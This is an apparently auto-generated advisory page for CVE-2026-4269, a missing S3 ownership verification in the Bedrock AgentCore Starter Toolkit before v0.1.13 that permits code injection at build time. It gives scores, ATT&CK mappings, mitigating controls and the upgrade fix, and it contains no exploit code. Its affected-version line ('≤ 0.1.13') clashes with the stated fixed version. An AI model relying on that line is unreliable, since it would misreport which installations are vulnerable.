Cyber Resilience

CVE-2026-4269

Medium

Published: 16 March 2026

Published
16 March 2026
Modified
11 May 2026
KEV Added
Patch
CVSS Score v4 5.8 CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0007 21.2th percentile
Risk Priority 12 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-4269 is a medium-severity Unverified Ownership (CWE-283) vulnerability in Amazon Bedrock Agentcore Starter Toolkit. Its CVSS base score is 5.8 (Medium).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Client Execution (T1203); ranked at the 21.2th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and SI-7 (Software, Firmware, and Information Integrity).

Deeper analysis

CVE-2026-4269 stems from a missing S3 ownership verification in the Bedrock AgentCore Starter Toolkit prior to version v0.1.13. This flaw affects only users who build or have built the toolkit after September 24, 2025; those on version v0.1.13 or later, or who built earlier versions before that date, remain unaffected. The vulnerability enables code injection during the build process, resulting in arbitrary code execution within the AgentCore Runtime, and is associated with CWE-283 (Unverified Ownership) and CWE-340 (Generation of Predictable Numbers or Identifiers).

A remote attacker can exploit this over the network without privileges, though it demands high attack complexity and user interaction, per its CVSS v3.1 base score of 7.5 (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H). By compromising the S3 verification step, the attacker injects malicious code into the build, achieving full code execution in the runtime environment with high impacts on confidentiality, integrity, and availability.

AWS advisories recommend upgrading to Bedrock AgentCore Starter Toolkit v0.1.13 as the sole remediation. Details are available in the AWS security bulletin at https://aws.amazon.com/security/security-bulletins/2026-008-AWS/ and the GitHub release notes at https://github.com/aws/bedrock-agentcore-starter-toolkit/releases/tag/v0.1.13.

EU & UK References

Vulnerability details

A missing S3 ownership verification in the Bedrock AgentCore Starter Toolkit before version v0.1.13 may allow a remote actor to inject code during the build process, leading to code execution in the AgentCore Runtime. This issue only affects users of…

more

the Bedrock AgentCore Starter Toolkit before version v0.1.13 who build or have built the Toolkit after September 24, 2025. Any users on a version >=v0.1.13, and any users on previous versions who built the toolkit before September 24, 2025 are not affected. To remediate this issue, customers should upgrade to version v0.1.13.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1203 Exploitation for Client Execution Execution
Adversaries may exploit software vulnerabilities in client applications to execute code.
T1059 Command and Scripting Interpreter Execution
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.
Why these techniques?

Missing S3 ownership verification enables code injection into the build process of a client-side toolkit, directly facilitating exploitation for client execution (T1203) that results in arbitrary code execution (T1059) within the runtime.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-5707Same vendor: Amazon
CVE-2026-5747Same vendor: Amazon
CVE-2026-5709Same vendor: Amazon
CVE-2026-7461Same vendor: Amazon
CVE-2026-3338Same vendor: Amazon
CVE-2026-7426Same vendor: Amazon
CVE-2025-23206Same vendor: Amazon
CVE-2026-7424Same vendor: Amazon
CVE-2026-3336Same vendor: Amazon
CVE-2026-5708Same vendor: Amazon

Affected Assets

amazon
bedrock agentcore starter toolkit
≤ 0.1.13

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Verifies authenticity and ownership of S3 objects pulled during the Bedrock AgentCore Starter Toolkit build process, directly preventing code injection from unverified sources.

prevent

Enforces integrity verification of software and components in the AgentCore Runtime, blocking execution of code injected via the unverified S3 flaw.

prevent

Requires timely flaw remediation through upgrading to Bedrock AgentCore Starter Toolkit v0.1.13, eliminating the missing S3 ownership verification vulnerability.

References